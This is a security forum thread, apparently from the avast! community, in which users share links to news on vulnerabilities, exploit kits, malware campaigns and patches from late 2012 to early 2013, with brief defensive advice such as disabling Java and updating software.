Exploit toolkits incorporates new Flash-exploit: http://eromang.zataz.com/2012/11/24/gong-da-gondad-exploit-pack-add-adobe-flash-cve-2012-1535-support/
link author = Eric Romang
polonus
-
***
Dutch gov't: suspects must decrypt computers
The Dutch government says it is planning to make it a crime for a suspect in a child sex abuse or terrorism case to refuse to help decrypt a computer when ordered to do so by prosecutors.
The legislation was prompted by a case in Amsterdam last year, in which a pedophile who abused more than 80 children and infants used sophisticated computer encryption software that slowed his investigation. Members of his network are still being caught.
Read more at :
http://my.earthlink.net/article/tec?guid=20121128/7ac907f3-bf73-4121-a338-e89809405f32
***
-
***
UN nuclear agency reports being hacked
The International Atomic Energy Agency acknowledged Tuesday that one of its servers had been hacked after a previously unknown group critical of Israel's undeclared nuclear weapons program posted contact details for more than 100 experts working for the U.N. nuclear watchdog.
A group called "Parastoo" — Farsi for the swallow bird and a common Iranian girl's name — claimed responsibility for posting the names on its website two days ago.
Read more at :
http://my.earthlink.net/article/tec?guid=20121127/c30814f7-bb01-458d-9f57-c092f96a0f77
***
-
Firms to meet more "salami" attacks for 2013: http://www.varonis.com/news-events/press-releases/2012/2013-predictions.html
link article author = Yaki Faitelson
polonus
-
***
Algerian hacker hijacks the Romanian domains of Google and Yahoo
The Romanian domains of Google and Yahoo encountered a hiccup earlier this morning, when an alleged Algerian hacker re-directed Google.ro and Yahoo.ro users to a page where the hacker who uses the monicker MCA-CRB wrote the message 'to be continued'.
Read more at :
http://www.topix.com/tech/computer-security/2012/11/algerian-hacker-hijacks-the-romanian-domains-of-google-and-yahoo
-
***
Cyber attack reporting will boost defence capability, says Neelie Kroes
The European Commission (EC) is considering making it mandatory for companies to report cyber attacks to harness the benefits of open dialogue, says vice-president Neelie Kroes.
Despite industry opposition, open discussion about cyber threats is vital to enable organisations to learn and improve understanding of the issue, she told the German publication Süddeutsche Zeitung.
Read more at :
http://www.computerweekly.com/news/2240172870/Cyber-attack-reporting-will-boost-defence-capability-says-Neelie-Kroes
***
-
Samsung network printer vulnerability discovered
http://www.h-online.com/security/news/item/Samsung-network-printer-vulnerability-discovered-1757967.html
http://www.kb.cert.org/vuls/id/281284
-
just notised....VirusTotal have some new scanners, like.....Malwarebytes ;)
https://www.virustotal.com/file/ca9722329a3c57be5a9e15fa58252377604a4d73dc1c3400aaa62c193f808ac9/analysis/
http://blog.virustotal.com/2012/11/virustotal-malwarebytes.html
-
Thanks for the general heads-up on this. Alraedy was aware of this positive addition to VT...
polonus
-
just notised....VirusTotal have some new scanners, like.....Malwarebytes ;)
Great, it was about time. :)
-
just notised....VirusTotal have some new scanners, like.....Malwarebytes ;)
Great, it was about time. :)
I'm sure it used to be one there for a period of time but came off for some reason or other.
-
Scammers Target Chrome Users With Fake Update Page
Scammers are an innovative bunch, and security researchers have uncovered a method they are using to get around the security features built into the Google Chrome Web browser.
http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page (http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page)
-
Account theft still possible with latest WhatsApp
http://www.h-online.com/security/news/item/Account-theft-still-possible-with-latest-WhatsApp-1760639.html
-
Scammers Target Chrome Users With Fake Update Page
Scammers are an innovative bunch, and security researchers have uncovered a method they are using to get around the security features built into the Google Chrome Web browser.
http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page (http://securitywatch.pcmag.com/none/305575-scammers-target-chrome-users-with-fake-update-page)
This is very easily avoided by using the built in update function in Chrome.
(Never use an outside link for a built in function and avoid these kind of scams.
(http://www.jetScreenshot.com/demo/20121202-86g-26kb.jpg)
-
Worm Tries AutoRun, Then Social Engineering to Infect.
http://www.majorgeeks.com/story.php?id=36748
-
Season's gr3371ng5 - hacker releases exploits for MySQL and SSH
http://www.h-online.com/open/news/item/Season-s-gr3371ng5-hacker-releases-exploits-for-MySQL-and-SSH-1761125.html
-
Tumblr troubled by trojan text
http://www.h-online.com/security/news/item/Tumblr-troubled-by-trojan-text-1761800.html
-
Beware… The 12 Christmas Online Scams
http://lavasoft.com/mylavasoft/company/blog/beware%E2%80%A6-the-12-christmas-online-scams
-
Microsoft Security Bulletin Advance Notification for December 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-dec
-
Necurs malware threatens and disables av scanners: http://blogs.technet.com/b/mmpc/archive/2012/12/06/unexpected-reboot-necurs.aspx (article link author = Microsoft Malware Protection Center's Tim Liu)
polonus
-
Malicious QR barcode stickers found http://www.theregister.co.uk/2012/12/10/qr_code_sticker_scam/ (article author = John Leyden)
polonus
-
This issue with the potential for malicious QR codes has been known about for some considerable time now (certainly for me) as like the short URLs there are limited ways to confirm what the end URL is without actually clicking on the link or scanning the QR code.
-
Hi DavidR,
Yes and you will see these scan codes more and more. On local busses, in newspaper ads, etc.
polonus
-
Millions stolen with mTAN fraud
http://www.h-online.com/security/news/item/Millions-stolen-with-mTAN-fraud-1763923.html
https://www.checkpoint.com/products/downloads/whitepapers/Eurograbber_White_Paper.pdf
-
Hi DavidR,
Yes and you will see these scan codes more and more. On local busses, in newspaper ads, etc.
polonus
Millions stolen with mTAN fraud
http://www.h-online.com/security/news/item/Millions-stolen-with-mTAN-fraud-1763923.html
https://www.checkpoint.com/products/downloads/whitepapers/Eurograbber_White_Paper.pdf
I recall a time when a phone was just simply a phone. I choose to have a service that costs only $40.00 a month, and it certainly does not support a smartphone, and does what I need to have it do. Internet surfing is useless on this device, but it is there. Think risk factor is much less with such a device, IMO.
-
Joomla sites misused to deploy malware
http://www.h-online.com/open/news/item/Joomla-sites-misused-to-deploy-malware-1766841.html
https://isc.sans.edu/diary/Joomla+and+WordPress+Bulk+Exploit+Going+on/14677
-
Apps for Windows 8 easily hacked
http://www.h-online.com/security/news/item/Apps-for-Windows-8-easily-hacked-1767839.html
-
Users of IE spied upon through unpatched mouse-cursor vulnerability (virtual keyboard users at risk): http://spider.io/blog/2012/12/internet-explorer-data-leakage/
polonus
-
More Google Chrome specific malware expected in 2013. For instance malcreants like to adopt the Carberp digital bankrobber to function in the Google Chrome browser: http://malware.dontneedcoffee.com/2012/12/carberprenaissance.html#!/2012/12/carberprenaissance.html (link author = Kafeine)
polonus
-
Carberp started to infect through malcious QR: http://www.securelist.com/en/blog/208194045/Carberp_in_the_Mobile (link article author = Denis, Kaspersky Lab Expert on a series of articles on Man in the Mobile Attacks)
polonus
-
Internet Explorer Bug Tracks Every Mouse Move, Even Outside the Browser
http://www.bitdefender.com/security/internet-explorer-bug-tracks-every-mouse-move-even-outside-the-browser.html
-
Trojan.Batchwiper
http://www.symantec.com/connect/blogs/trojanbatchwiper-reported-iran (http://www.symantec.com/connect/blogs/trojanbatchwiper-reported-iran)
-
Exynos 4 critical security hole affects many Galaxy devices
http://www.h-online.com/open/news/item/Exynos-4-critical-security-hole-affects-many-Galaxy-devices-1770075.html
-
Massive iframe injection alert: http://stopmalvertising.com/malware-reports/massive-iframe-injection-hits-several-cms.html
(article author Kimbedrley)
polonus
-
Security update for Windows lets fonts disappear
http://www.h-online.com/security/news/item/Security-update-for-Windows-lets-fonts-disappear-1771419.html
-
Thank you for the update DJBone.
-
(http://www.gfi.com/blog/wp-content/uploads/2012/12/ransomsurvey2-300x137.png)
Ransomware Locks Desktop with Survey Offers (http://www.gfi.com/blog/ransomware-locks-desktop-with-survey-offers/)
( Is avast! protecting us against this one ??? )
-
Security Alert: SpamSoldier
https://blog.lookout.com/blog/2012/12/17/security-alert-spamsoldier/
-
Adobe Shockwave player provides vulnerable Flash runtime
http://www.kb.cert.org/vuls/id/323161
-
Security update for Windows lets fonts disappear
http://www.h-online.com/security/news/item/Security-update-for-Windows-lets-fonts-disappear-1771419.html
Note: Fix is available now: http://forum.avast.com/index.php?msg=876713
-
Exynos 4 critical security hole affects many Galaxy devices
http://www.h-online.com/open/news/item/Exynos-4-critical-security-hole-affects-many-Galaxy-devices-1770075.html
Samsung to fix Exynos vulnerability in software update 'as quickly as possible'
http://www.androidcentral.com/samsung-fix-exynos-vulnerability-software-update-soon-possible
-
Trojan horse for Linux here: http://www.symantec.com/security_response/writeup.jsp?docid=2012-122012-3441-99&inid=us_sr_carousel (http://www.symantec.com/security_response/writeup.jsp?docid=2012-122012-3441-99&inid=us_sr_carousel)
-
AMD warns of security hole in its Catalyst Control Center
http://www.h-online.com/security/news/item/AMD-warns-of-security-hole-in-its-Catalyst-Control-Center-1773314.html
-
Sudoku and malware with your coffee?
http://nakedsecurity.sophos.com/2012/12/19/sudoku-and-malware-with-your-coffee/
-
nvidia-display-driver-service-attack-escalates-privileges-windows-machines-122712
https://threatpost.com/en_us/blogs/nvidia-display-driver-service-attack-escalates-privileges-windows-machines-122712 (https://threatpost.com/en_us/blogs/nvidia-display-driver-service-attack-escalates-privileges-windows-machines-122712)
Suggest disabling the nvidia display driver service for domain-based machines in particular for the time being until nVidia issues a fix/update.
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/ (http://blogs.technet.com/b/srd/)
-
SQL injection vulnerability hits all Ruby on Rails versions
http://www.h-online.com/open/news/item/SQL-injection-vulnerability-hits-all-Ruby-on-Rails-versions-1776203.html
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/ (http://blogs.technet.com/b/srd/)
"Vulnerability in Internet Explorer Could Allow Remote Code Execution"
"Microsoft is aware of targeted attacks that attempt to exploit this vulnerability through Internet Explorer 8."
http://technet.microsoft.com/en-us/security/advisory/2794220
Hey, I'm just a Linux user for the last few years, but maybe Windows users need to know about this stuff?
-
Fatal error leads TURKTRUST to issue dangerous SSL certificates
http://www.h-online.com/security/news/item/Fatal-error-leads-TURKTRUST-to-issue-dangerous-SSL-certificates-1777291.html
http://technet.microsoft.com/en-us/security/advisory/2798897
http://googleonlinesecurity.blogspot.com/2013/01/enhancing-digital-certificate-security.html
https://blog.mozilla.org/security/2013/01/03/revoking-trust-in-two-turktrust-certficates/
-
Microsoft Security Bulletin Advance Notification for January 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jan
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/ (http://blogs.technet.com/b/srd/)
Researchers Bypass Microsoft Fix It for IE Zero Day
http://threatpost.com/en_us/blogs/researchers-bypass-microsoft-fix-it-ie-zero-day-010413
http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/
http://forum.avast.com/index.php?msg=881171
-
Conficker targets photography lovers (https://www.net-security.org/malware_news.php?id=2368)
"The appliances in question, which “reads” film negatives
and reproduces the photos on a computer, have been found
to contain the Conficker.B variant."
-
X-mas 2012 exploit hole found up for NVidia drivers through which malcreants could take full control of the machine. Patch your drivers here: http://www.geforce.com/
polonus
-
Exynos 4 critical security hole affects many Galaxy devices
http://www.h-online.com/open/news/item/Exynos-4-critical-security-hole-affects-many-Galaxy-devices-1770075.html
Samsung to fix Exynos vulnerability in software update 'as quickly as possible'
http://www.androidcentral.com/samsung-fix-exynos-vulnerability-software-update-soon-possible
Report: Samsung pushes fix for Exynos 4 flaw to Galaxy SIII
http://www.h-online.com/open/news/item/Report-Samsung-pushes-fix-for-Exynos-4-flaw-to-Galaxy-SIII-1778211.html
-
Security Advisory for ColdFusion
http://www.adobe.com/support/security/advisories/apsa13-01.html
-
New Java zero-day actively being abused. Users are advised to disable java inside the browser for now: http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/ link article poster = jaime.blasco
polonus
-
Current Foxit Reader can execute malicious code
http://www.h-online.com/security/news/item/Current-Foxit-Reader-can-execute-malicious-code-1780636.html
http://secunia.com/advisories/51733/
-
Critical vulnerability in Ruby on Rails parameter parsing
http://www.h-online.com/security/news/item/Critical-vulnerability-in-Ruby-on-Rails-parameter-parsing-1780073.html
Exploits for Ruby on Rails holes now in circulation
http://www.h-online.com/open/news/item/Exploits-for-Ruby-on-Rails-holes-now-in-circulation-1781158.html
-
New Java zero-day actively being abused. Users are advised to disable java inside the browser for now: http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/ link article poster = jaime.blasco
Protecting Users Against Java Vulnerability
https://blog.mozilla.org/security/2013/01/11/protecting-users-against-java-vulnerability/
Apple Blocks Java 7 Plug-in on OS X to Address Widespread Security Threat
http://www.macrumors.com/2013/01/11/apple-blocks-java-7-on-os-x-to-address-widespread-security-threat/
-
Hi Asyn,
Well, we all have to wait until coming Tuesday's Oracle patch cycle: http://isc.sans.edu/diary/Oracle+Patch+Tuesday+Pre-Release/14920
Link from SANS Internet Storm Centre's by Stephen Hall (Version: 1) of what is coming patched,
polonus
-
Hi Asyn,
Well, we all have to wait until coming Tuesday's Oracle patch cycle: http://isc.sans.edu/diary/Oracle+Patch+Tuesday+Pre-Release/14920
Link from SANS Internet Storm Centre's by Stephen Hall (Version: 1) of what is coming patched,
polonus
Pol, the problem is, there's no Java fix listed (yet).
Neither here, btw: http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html
-
MY BAD
-
Hi Asyn,
Well, we all have to wait until coming Tuesday's Oracle patch cycle: http://isc.sans.edu/diary/Oracle+Patch+Tuesday+Pre-Release/14920
Link from SANS Internet Storm Centre's by Stephen Hall (Version: 1) of what is coming patched,
polonus
Pol, the problem is, there's no Java fix listed (yet).
Neither here, btw: http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html
MY BAD
No need to apologize or edit your post. The root problem is that all .jre versions have been found to have legacy code in it that is continuously expliotable down to the kernel level; the only way to mitigate that is to either disable java plugin in your browser(s) or remove it entirely or use an operating system resistant to such exploits.
-
Users should watch out for rogue chrome updates provided by malware sites as normal chrome browser updates are performed automatically without any user interaction. See: https://www.virustotal.com/file/19d087ddaadf8fc3d5b8a422dc303e6ea6cdac2a55b4b14e9f28aec9c8902439/analysis/
polonus
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/ (http://blogs.technet.com/b/srd/)
Researchers Bypass Microsoft Fix It for IE Zero Day
http://threatpost.com/en_us/blogs/researchers-bypass-microsoft-fix-it-ie-zero-day-010413
http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/
http://forum.avast.com/index.php?msg=881171
Advance Notification for Update to Address Security Advisory 2794220
http://blogs.technet.com/b/msrc/archive/2013/01/13/advance-notification-for-update-to-address-security-advisory-2794220.aspx
-
Oracle patches latest zero-day vulnerabilities in Java
http://www.computerworld.com/s/article/9235696/Oracle_patches_latest_zero_day_vulnerabilities_in_Java
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run.. Now how foolproof is that
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run.. Now how foolproof is that
Now you can put the blame on the user for the infection and hold Oracle blameless. :'(
-
The attack code abusing the vulnerability, has been added to exploit-kits like Blackhole, Nuclear Pack en Cool Exploit Kit and also to Gong Da / Gondad Exploit Pack, read: http://eromang.zataz.com/2013/01/13/gong-da-gondad-exploit-pack-add-java-cve-2013-0422-support/ (link article author eric romang)
polonus
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run.. Now how foolproof is that
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run.. Now how foolproof is that
Now you can put the blame on the user for the infection and hold Oracle blameless. :'(
We can do better than that. All we have to do is remove java completely and avoid this issue entirely. Shame on Oracle for resorting to "fixing" a known exploit that is now being actively exploited in the wild in this way.
This is a "fix" I could have done by myself, no help needed from Oracle. Problem is, do noobies know what to do with the alerts? Probably not. >:( More work for IT staff anyways.
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run.. Now how foolproof is that
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run.. Now how foolproof is that
Now you can put the blame on the user for the infection and hold Oracle blameless. :'(
We can do better than that. All we have to do is remove java completely and avoid this issue entirely. Shame on Oracle for resorting to "fixing" a known exploit that is now being actively exploited in the wild in this way.
This is a "fix" I could have done by myself, no help needed from Oracle. Problem is, do noobies know what to do with the alerts? Probably not. >:( More work for IT staff anyways.
Confirmed: Java only fixed one of the two bugs
http://immunityproducts.blogspot.ca/2013/01/confirmed-java-only-fixed-one-of-two.html
-
Security Advisory for ColdFusion
http://www.adobe.com/support/security/advisories/apsa13-01.html
Security update: Hotfix available for ColdFusion
http://www.adobe.com/support/security/bulletins/apsb13-03.html
http://helpx.adobe.com/coldfusion/kb/coldfusion-security-hotfix-apsb13-03.html
-
Another Java breach .. Uninstall guys http://krebsonsecurity.com/2013/01/new-java-exploit-fetches-5000-per-buyer/
-
Malware Infecting US Power Plant SCADA Systems
http://www.hotforsecurity.com/blog/malware-infecting-us-power-plant-scada-systems-5050.html (http://www.hotforsecurity.com/blog/malware-infecting-us-power-plant-scada-systems-5050.html)
It's already happening here.
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Anyone realize that the icons for url and others in the text reply box are java-script based, and will not work or be present when JavaScript is turned off in the browser?
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
You can also check the following thread for full removal details:
http://forum.avast.com/index.php?topic=19387.msg884597#msg884597 (http://forum.avast.com/index.php?topic=19387.msg884597#msg884597)
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
You can also check the following thread for full removal details:
http://forum.avast.com/index.php?topic=19387.msg884597#msg884597 (http://forum.avast.com/index.php?topic=19387.msg884597#msg884597)
Sorry, guys.
Some things I have yet to learn. Reason I noted javascript in the browser is because without it running, then things such as accessing webmail is not possible unless one uses an older version of it that does not require it, c|net member logon not doable without it, even mediafire will not work without it, Avast text reply box is missing the common icons for text and link enhancement, and so on. Since it is the java plugin from Oracle that is 99% of the problem, have been testing running the browser without javascript and finding it seems to be used in everything everywhere I go.
Do not have java anything installed atm, just so you know. It is apparent that FF, at least, provides their own version of java in the form of a FF javascript and one still needs that to view normal web content within the browser. Just experimenting.
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
You can also check the following thread for full removal details:
http://forum.avast.com/index.php?topic=19387.msg884597#msg884597 (http://forum.avast.com/index.php?topic=19387.msg884597#msg884597)
Sorry, guys.
Some things I have yet to learn. Reason I noted javascript in the browser is because without it running, then things such as accessing webmail is not possible unless one uses an older version of it that does not require it, c|net member logon not doable without it, even mediafire will not work without it, Avast text reply box is missing the common icons for text and link enhancement, and so on. Since it is the java plugin from Oracle that is 99% of the problem, have been testing running the browser without javascript and finding it seems to be used in everything everywhere I go.
Do not have java anything installed atm, just so you know. It is apparent that FF, at least, provides their own version of java in the form of a FF javascript and one still needs that to view normal web content within the browser. Just experimenting.
You want to get rid of Java not java script. They aren't the same. If you get rid of java script, then you'll find that many things will not work.
In Firefox, use NoScript in Chrome, use FlashControl. both of these browser add-ons give you the option to either allow or not allow the scrip for a page that needs it.
-
Microsoft bombs another security test
http://reviews.cnet.com/8301-3667_7-57564385/microsoft-bombs-another-security-test/?ttag=fbwp
-
Microsoft bombs another security test
http://reviews.cnet.com/8301-3667_7-57564385/microsoft-bombs-another-security-test/?ttag=fbwp (http://reviews.cnet.com/8301-3667_7-57564385/microsoft-bombs-another-security-test/?ttag=fbwp)
And avast! has another good showing. (http://goo.gl/CKRpV) :)
-
Shylock calling Skype
https://www.csis.dk/en/csis/blog/3811/
-
New plugin exploit for Foxit Reader
http://www.pcworld.com/article/2025154/foxit-reader-security-flaw-reportedly-allows-attack.html (http://www.pcworld.com/article/2025154/foxit-reader-security-flaw-reportedly-allows-attack.html)
Patch is now available within Foxit Reader
Open Foxit Reader GUI>Help>Check For Updates Select Update Version 5.4.5.0114. Alternatively, http://www.foxitsoftware.com/Secure_PDF_Reader/ (http://www.foxitsoftware.com/Secure_PDF_Reader/) and select download button 'Free Foxit Reader Download' uninstall/reboot/install. Either will secure Foxit Reader from outside attack.
-
Two new java leaks detected: http://archives.neohapsis.com/archives/fulldisclosure/2013-01/0143.html (link author Security Exploration's Adam Gowdiak).
Question is when is Oracle going to dump java? This is being predicted to happen soon here: http://www.cio.com/article/727028/Pull_the_Plug_on_Java_Before_It_s_Too_Late?page=2&taxonomyId=3191 (article author = Rob Enderle)
polonus
-
Malware poses as real java update: http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/ (link source author = TrendMicro's Rhena Inocencio)
polonus
-
[SE-2012-01] Java 7 Update 11 confirmed to be vulnerable
http://seclists.org/fulldisclosure/2013/Jan/142
-
Hi Asyn,
You have disabled java, haven't you? We now need ahead of the threat prevention updates...
polonus
-
Hi Asyn,
1. You have disabled java, haven't you?
2. We now need ahead of the threat prevention updates...
polonus
1. Not only disabled it, I deleted Java a long time ago.
2. I fear, that won't happen...
-
Current Foxit Reader can execute malicious code
http://www.h-online.com/security/news/item/Current-Foxit-Reader-can-execute-malicious-code-1780636.html
http://secunia.com/advisories/51733/
Fixed Foxit Reader released
http://www.h-online.com/security/news/item/Fixed-Foxit-Reader-released-1787736.html
-
Leaked DIY undetected malware generating tool: http://blog.webroot.com/2013/01/18/leaked-diy-malware-generating-tool-spotted-in-the-wild/
link source author Dancho Danchev
polonus
-
Threat alert for APT hack tools used by miscreants: http://blog.trendmicro.com/trendlabs-security-intelligence/throwing-some-light-on-apt-hacktools/
(link article author = Trendmicro's Roland Dela Paz (Threat Researcher))
polonus
-
New Skype Worm Threat - Phorpiex : http://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/
(link article author = TrendMicro's Mark Joseph Manahan (Threat Response Engineer)
polonus
-
Backdoors in many Barracuda appliances
http://www.h-online.com/security/news/item/Backdoors-in-many-Barracuda-appliances-1790947.html
-
Malwarebytes mimic site ‘Malwarebiter(dot)com’ hosts fake anti-malware product and spreads malware.
WARNING: Do NOT visit ‘Malwarebiter(dot)com‘ unless you are using a secured environment (i.e. Virtual Machine or Sandbox)
http://blog.malwarebytes.org/intelligence/2013/01/cta-malwarebiter-com/
-
You cannot trust social media to keep your private data safe: Story of a Twitter vulnerability
http://blog.ioactive.com/2013/01/you-can-not-trust-social-media-twitter-vulnerable.html
-
Security fears over exposure of web-accessible printers
http://www.theage.com.au/it-pro/security-it/security-fears-over-exposure-of-webaccessible-printers-20130129-2dhxo.html
-
Oracle plans to talk down Java security concerns ::)
http://www.h-online.com/security/news/item/Oracle-plans-to-talk-down-Java-security-concerns-1792872.html
-
Oracle plans to talk down Java security concerns ::)
http://www.h-online.com/security/news/item/Oracle-plans-to-talk-down-Java-security-concerns-1792872.html (http://www.h-online.com/security/news/item/Oracle-plans-to-talk-down-Java-security-concerns-1792872.html)
If you can't fix it, sweep it under the rug. ;D
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html (http://www.bleepingcomputer.com/forums/topic483431.html)
Ouch that's bad news
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html (http://www.bleepingcomputer.com/forums/topic483431.html)
Ouch that's bad news
It really is. I PM Essexboy, jeff, and magna with the link.
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html (http://www.bleepingcomputer.com/forums/topic483431.html)
Ouch that's bad news
It really is. I PM Essexboy, jeff, and magna with the link.
It actually effects all those that received help if I'm not mistaken. :'(
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html (http://www.bleepingcomputer.com/forums/topic483431.html)
Ouch that's bad news
It really is. I PM Essexboy, jeff, and magna with the link.
It actually effects all those that received help if I'm not mistaken. :'(
Yes. According to Grinler if a copy of comboFix have been used for the past couple of day, it would be better to check out the comp.
Copies affected:
SHA256 Hashes
4524611a78ddd40afa7e13238da230302786c546d1f824e6e7dea480a5d55333
e5341c3c32a9726a2d3dd1ac0b90f13d896581ab8707dd0a17431df061a2a71d
4524611a78ddd40afa7e13238da230302786c546d1f824e6e7dea480a5d55333
e95f77fd437b16312fbd66a02fed8b179968a7615c1bd3cd3b2fd86879b4bbc8
Other copies are added on latter on the thread.
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
Thanks for the warning..!!
-
It is not that alarming and the situation is not that overall dramatical. Not all instances of Combofix have become infected: http://www.bleepingcomputer.com/forums/topic483431.html
But for non-qualified removal purposes which what we strongly advise against and in the hands of normal users Combofix is a no no at the moment...
polonus
-
Combofix back on line now
-
[SE-2012-01] An issue with new Java SE 7 security features
http://seclists.org/fulldisclosure/2013/Jan/241
-
Latest VLC version has dangerous hole
http://www.h-online.com/security/news/item/Latest-VLC-version-has-dangerous-hole-1794474.html
http://www.videolan.org/security/sa1302.html
-
Large Scale Malvertising Campaigns via Clicksor Ad Network try to infect users via Blackhole exploits: http://www.trusteer.com/blog/malvertising-campaigns-get-a-boost-from-unpatched-java-zero-day-exploits (link article author - George Tubin)
polonus
-
avast! blog: Is your home updated? (https://blog.avast.com/2013/01/31/is-your-home-updated/)
-
Java needed to get on the Link to SurveyMonkey survey.
-
Howdy bob3160,
Checked this:
Universal Plug and Play
Router Security Check
Scan Results
Congratulations! Your router did not respond to a UPnP discovery request.
Nice to know! Thanks, bob3160...
pol
-
Wait to use VLC Media Player until a new patch for a serious hole via a specially crafted ASF-file
has become available: http://www.videolan.org/security/sa1302.html
Credit for reporting the unpatched vulnerability in the ASF demuxer (libasf_plugin) goes to Debasish Mandal,
polonus
-
Java needed to get on the Link to SurveyMonkey survey.
No it requires Javascript which is completely different from JAVA.
-
Wait to use VLC Media Player until a new patch for a serious hole via a specially crafted ASF-file
has become available: http://www.videolan.org/security/sa1302.html
Already posted it. ;) See: http://forum.avast.com/index.php?msg=889517
-
Hi Asyn,
You have beaten me to it. At least now there is no excuse anymore for those that did not temporarily manually disabled that libasf_plugin in VLC.
The nightly built already has the patch for this: http://nightlies.videolan.org/
polonus
-
Apple's block on Java blocks ad flow
http://www.theage.com.au/it-pro/security-it/apples-block-on-java-blocks-ad-flow-20130201-2dpix.html
-
Alarming Kaspersky Lab Report: http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities
The situation regarding users with outdated vulnerable Java is really alarming...
polonus
-
Alarming Kaspersky Lab Report: http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities (http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities)
The situation regarding users with outdated vulnerable Java is really alarming...
polonus
No really alarming considering the number of people I meet who still have either no or expired AV protection on their system. :(
What makes us think that these people worry about updating even if they receive a notice.
-
Alarming Kaspersky Lab Report: http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities (http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities)
The situation regarding users with outdated vulnerable Java is really alarming...
polonus
No really alarming considering the number of people I meet who still have either no or expired AV protection on their system. :(
What makes us think that these people worry about updating even if they receive a notice.
That used to be me, to be quite honest, running no av, nothing up to date, suprising that during that time I only had 1 virus. :L
-
Hi bob3160,
Completely agree with your analysis. We here became aware why we should update and patch, but the majority of users never ever consider to...totally ignorant bunch. Sounds dramatic and alarming to us, but we are a tiny minority and these are the facts... :(
Hopefully we converted Ddm5 now while he visited these here forums... 8)
polonus
-
Most people don't get religion until they find they are mortal, e.g. the don't worry about security until they have a serious virus/malware infection that deprives them of their computer for a few days and or costs them money to have fixed.
-
Most people don't get religion until they find they are mortal, e.g. the don't worry about security until they have a serious virus/malware infection that deprives them of their computer for a few days and or costs them money to have fixed.
Many of the people that have seen my presentation (https://docs.google.com/document/d/1tzuKuKhYPfW_RaXhAYeZiHifOrykTdQwflbGgzwijF4/edit), have also learned the importance of always staying up to date.
Some people you will never convince and they're usually the ones who spread the infections onto their unsuspecting
and uneducated "friends".
-
Android malware carries Windows snooping app
http://www.h-online.com/security/news/item/Android-malware-carries-Windows-snooping-app-1797241.html
http://www.securelist.com/en/blog/805/Mobile_attacks
-
Exclusive: Microsoft and Symantec disrupt cyber crime ring
http://news.yahoo.com/exclusive-software-makers-disrupt-cyber-ring-halt-searches-201207523--finance.html
-
Front company used to sign malware
http://www.h-online.com/security/news/item/Front-company-used-to-sign-malware-1799101.html
http://blog.malwarebytes.org/intelligence/2013/02/digital-certificates-and-malware-a-dangerous-mix/
-
New exploit kit on the block: http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html?m=1 (article author = 'Kafeine')
polonus
-
Most people don't get religion until they find they are mortal, e.g. the don't worry about security until they have a serious virus/malware infection that deprives them of their computer for a few days and or costs them money to have fixed.
Hi bob3160,
Completely agree with your analysis. We here became aware why we should update and patch, but the majority of users never ever consider to...totally ignorant bunch. Sounds dramatic and alarming to us, but we are a tiny minority and these are the facts... :(
Hopefully we converted Ddm5 now while he visited these here forums... 8)
polonus
I guess you could say that David, luckily torrenting actually saved me, twice, but more to the point, as polonus said I guess you could say I'm converted, I update all my things, do AV scans, use appropriate security software, etc, during the time I had that virus I knew something dodgy was going on, so I found the source, but as I said, I got off luckily with having Win7 and Win xp disks at the ready, whenever needed, these days paired with a dban disk. So yea..
-
Massive search fraud botnet seized by Microsoft and Symantec
